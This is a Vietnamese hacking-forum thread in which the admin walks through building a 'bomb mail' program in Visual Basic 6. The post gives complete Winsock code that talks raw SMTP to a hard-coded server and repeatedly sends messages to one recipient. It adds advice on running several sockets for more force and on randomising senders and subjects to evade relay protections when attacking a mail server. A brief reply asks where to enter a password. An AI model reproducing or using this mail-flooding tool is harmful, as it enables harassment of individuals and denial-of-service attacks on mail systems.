Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
Thu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
Thu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
Mon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
Tue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
Tue Apr 17, 2012 10:03 pm by Admin

» Giá của món quà
Fri Apr 13, 2012 6:01 am by Admin

» Sẽ chỉ yêu ai?
Fri Apr 13, 2012 6:01 am by Admin

» Cách đọc bảng chữ cái!
Thu Apr 12, 2012 10:37 pm by Admin

» Gắn trojan, keylog, virus vào website, forum
Tue Apr 10, 2012 1:14 am by Admin

Shopmotion


Affiliates
free forum


Làm chương trình bommail bằng VB

Go down

Làm chương trình bommail bằng VB

Post  Admin on Fri Feb 11, 2011 8:23 am

Phần chuẩn bị đầu tiên của chương trình là:

1. Tất nhiên là phải mở Microsoft Visual Basic (tôi sử dụng phiên bản 6.0)

2. Tạo một Form mới (tôi đặt tên Form này là frmMain)

3. Vào trên thanh Menu -->Project -->Components-->đánh dấu chọn vào mục Microsoft Winsock Control 6.0, sao đó nhấn OK thoát ra và kéo nó vào trong frmMain (nó sẽ có tên mặt định là Winsock1, cứ để nó thế nếu bạn muốn đổi tên cho khác một tý thì phần source dưới đây bạn phải đổi tên các sub Event cho nó nha.)

4. Tạo một nút lệnh (command) và đặt tên nó là cmdBomb.

5. Tạo một label có tên là lblStatus thông báo trạng thái của tiến trình

6. nhấn phải ngay frmMain vào phần View Code và bắt đầu nhá.

Và đây là đoạn code của chương trình tôi sẽ cố gắn chú thích trước mỗi đoạn code cho các bạn dễ nắm.

Code:
'----------------------

'Khai bao bien

'Bien kiem soat cau lenh goi di

Dim strCaulenh As String

'Bien de nhan thong tin tu server goi ve

Dim strData As String

'Bien de kiem soat so luong mail da goi di

Dim intbomb As Integer

'Tao Function cau lenh connect vao smtp server va tra ve cho ham mot chuoi ky tu dai dien de de be kiem soat.

Function clConnect(sckSend As Winsock, MailServerName As String) As String

'Kiem tra tinh trang cua sockket neu no o trang thai dong thi tien hanh ket noi

If sckSend.State = sckClosed Then

'Thiet lap Protocol

sckSend.Protocol = sckTCPProtocol

'Khai bao SMTP server se cho vao ham

sckSend.RemoteHost = MailServerName

'Khai bao Cong ket noi thuong la cong 25

sckSend.RemotePort = 25

'Goi cau lenh ket noi

sckSend.Connect

'Tra ve cho ham chuoi "Connect to" phan nay rat quan trong vi dung de kiem tra cung voi gia tri do server tra ve xem ket noi da OK hay chua.. ban se hieu ro muc dich cua phan nay. Day chinh la su khac biet ma toi da nghien cuu va so sanh voi cac source bomb mail tuong tu va toi nhan thay no rat hieu qua va don gian hon bat cu giai thuat nao khac. Moi ham sau day deu tra ve mot chuoi thong bao tuong tu

clConnect = "Connect to"

End If

End Function

'Tao Function goi cau lenh "helo" toi server ban nen luu y la moi cuoi cau lenh deu co ky tu dai dien cho phim Enter.

Function clHelo(sckSend As Winsock, txthello As String) As String

sckSend.SendData ("helo " + txthello + vbCrLf)

clHelo = "Helo"

End Function

'Tao Function goi cau lenh "mail from:" co them bien dia chi mail nguoi goi

Function clMailfrom(sckSend As Winsock, txtmailfrom As String) As String

sckSend.SendData ("mail from: " + txtmailfrom + vbCrLf)

clMailfrom = "Mail From"

End Function

'Tao Function goi cau lenh "rcpt to: " co them bien dia chi mail nguoi nhan

Function clRcptto(sckSend As Winsock, txtmailto As String) As String

sckSend.SendData ("rcpt to: " + txtmailto + vbCrLf)

clRcptto = "Rcpt To"

End Function

'Tao Function goi cau lenh "data" cau lenh bat dau mot noi dung cua buc thu

Function clData(sckSend As Winsock) As String

sckSend.SendData ("data" + vbCrLf)

clData = "Data"

End Function

'Tao function goi noi dung buc thu va co ket thuc la dau enter+ dau . + enter

Function clBody(sckSend As Winsock, strFromName As String, strToName As String, strSubject As String, strBody As String) As String

'khai bao cac bien tam theo thu tu

Dim Fourth As String, Fifth As String, Sixth As String

Dim Seventh As String, Eighth As String

'ai goi ??

Fourth = "From:" + Chr(32) + strFromName + vbCrLf

'Ai nhan ??

Fifth = "To:" + Chr(32) + strToName + vbCrLf

'Chu de buc thu

Sixth = "Subject:" + Chr(32) + strSubject + vbCrLf

'noi dung buc thu

Seventh = strBody + vbCrLf

'phan dau tien cua buc thu duoc goi truoc

Eighth = Fourth + Fifth + Sixth

'goi di phan dau

sckSend.SendData (Eighth + vbCrLf)

'goi tiep noi dung

sckSend.SendData (Seventh + vbCrLf)

'ket thuc noi dung va goi thu di

sckSend.SendData ("." + vbCrLf)

clBody = "Body"

End Function

'Tao ham thoat khoi server

Function clQuit(sckSend As Winsock) As String

sckSend.SendData ("quit" + vbCrLf)

clQuit = "Quit"

End Function

'va day la su kien khi nut lenh cmdBomb duoc click

Private Sub cmdbomb_Click()

lblStatus.Caption = ""

'hien thoi chua co mail nao duoc goi

intbomb = 0

'Bay loi

On Error GoTo thongbaoloi

'noi vao SMTP server co IP o day toi chon la 203.162.0.27

'Cac ban cung co the thay doi la "host name" hay IP address deu duoc ca. hoac co the xem chu thich 1 tai cuoi bai.

strCaulenh = clConnect(Winsock1, "203.162.0.27")

Exit Sub

thongbaoloi:

lblStatus.Caption = "Kiem tra ket noi cua ban"

End Sub

'Day la phan quan trong nhat cua chuong trinh, cac ban nen nam ro sau nay co the dung thuat toan nay de phat trien khong chi la goi thu qua SMTP server ma con nhan thu tu Pop3 ...

'Nhung gi server tra thong bao ve se nam o day

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)

'lay du lieu tu server tra ve

Winsock1.GetData strData

'bao ra nhan

lblStatus.Caption = strData

'neu 3 ky tu dau cua chuoi ma server tra ve sau khi nhan

'duoc cau lenh connect co gia tri la "220" tuc la server da

'chap nhan ket noi thi thuc hien tiep cau lenh "helo"

If (strCaulenh = "Connect to" And Left(strData, 3)= "220") Then

'xoa gia tri cho bien

strCaulenh = ""

strData = ""

strCaulenh = clHelo(Winsock1, "hotmail.com")

End If

'Tuong tu nhu tren neu moi viec dien ra tot dep thi goi tiep cau lenh "mail from: mail nguoi goi" co the xem them chu thich 2 cuoi bai.

If (strCaulenh = "Helo" And Left(strData, 3) = "250") Then

strCaulenh = ""

strData = ""

strCaulenh = clMailfrom(Winsock1, "mail nguoi goi")

End If

'Lan luoc goi tiep cac cau lenh tiep theo voi dieu kien chuoi ky tu cua server tra ve hoan toan hop le

If (strCaulenh = "Mail From" And Left(strData, 3) = "250") Then

strCaulenh = ""

strData = ""

strCaulenh = clRcptto(Winsock1, "mail nguoi nhan")

'xem chu thich vuoi bai

End If

If (strCaulenh = "Rcpt To" And Left(strData, 3) = "250") Then

strCaulenh = ""

strData = ""

strCaulenh = clData(Winsock1)

End If

If (strCaulenh = "Data" And Left(strData, 3) = "354") Then

strCaulenh = ""

strData = ""

strCaulenh = clBody(Winsock1, "ten nguoi goi", "ten nguoi nhan", "chu de buc thu", "noi dung buc thu")

End If

If (strCaulenh = "Body" And Left(strData, 3) = "250") Then

strCaulenh = ""

strData = ""

'kiem tra neu so luong mail da goi du thu cham dut

If intbomb >= 100 Then 'so luong mail can bom. xem chu thich ben duoi

strCaulenh = clQuit(Winsock1)

lblStatus.Caption = "Da bomb xong!"

'neu so luong mail chua du thi goi tiep

Else

intbomb = intbomb + 1

strCaulenh = clMailfrom(Winsock1, "ten nguoi goi")

End If

End If

End Sub

'neu socket ket noi bi loi

Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)

lblStatus.Caption = "Kiem tra ket noi hoac SMTP server"

Winsock1.Close

End Sub

'---------------------------

Thế là bạn đã viết được một chương trình bomb mail hoàn chỉnh rồi đó .. còn lại là công việc trang trí giao diện sao cho chương trình được đẹp mắt, nên thêm một số bẫy lỗi khi cần thiết để trách khi thực hiện chương trình bị hư dột suất vì nhiều lý do về mạng.

Những mục mà tôi đề nghị các bạn xem phần chú thích bên dưới này là những mục không quan trọng nhưng bạn nên thêm vào chương trình cho người sử dụng linh động trong việc cho vào địa chỉ mail người gởi, địa chỉ mail nguời nhận, tên người gởi, tên người nhận, số lượng mail cần dội bomb. và SMTP server nữa.

Bạn nên tạo những textbox cho ngưòi sủ dụng nhập những thông số kia vào tôi ví dụ (txtmailfrom --> thay thế "mail nguoi goi", txtmailto --> "mail nguoi nhan", txtnumbermail ---> thay thế cho số 100 mail cần gởi, txtMailserver -> dia chỉ của SMTP server, txtFromname -> "ten nguoi goi", txtToName-->"ten nguoi nhan", txtSubject-> chủ đề bức thư, txtBody->Nội dung bức thư, cho người sử dụng tự ý nhập vào và bạn đường quên một điều là phải kiểm tra xem dữ liệu người sử dụng đưa vào có hợp lệ hay không (chẳng hạn dịa chỉ mail có đúng chuẩn là địa chỉ mail hay không ... .) để hạn chế lỗi có thể xuất hiện vì dữ liệu nhập vào không đúng. Tôi nghĩ công việc đó quá đơn giản phải không các bạn. Một điều nữa là các bạn có thể kết hợp nhiều winsock để quá trình mail đuợc nhanh hơn, mạnh hơn, đó là phần của các bạn. Và nên nhớ một điều là nêu muốn tấn công một server mail nào đó thì nên cho phần địa chỉ người gởi một cách ngẫu nhiên

người nhận một cách ngẫu nhiên và chủ đề một cách ngẫu nhiên để tránh tình trạng relay của server. Mong các bạn thích chương trình này và hãy tự mình khám phá.
avatar
Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

View user profile http://hackis.forumvi.com

Back to top Go down

Help

Post  dangnhimyphuoc on Sun May 15, 2011 5:56 am

Bạn ơi, cho mình hỏi là khi nhập email của mình thì điền pass vào chỗ nào vậy??

dangnhimyphuoc

Tổng số bài gửi : 3
Join date : 2011-05-15

View user profile

Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum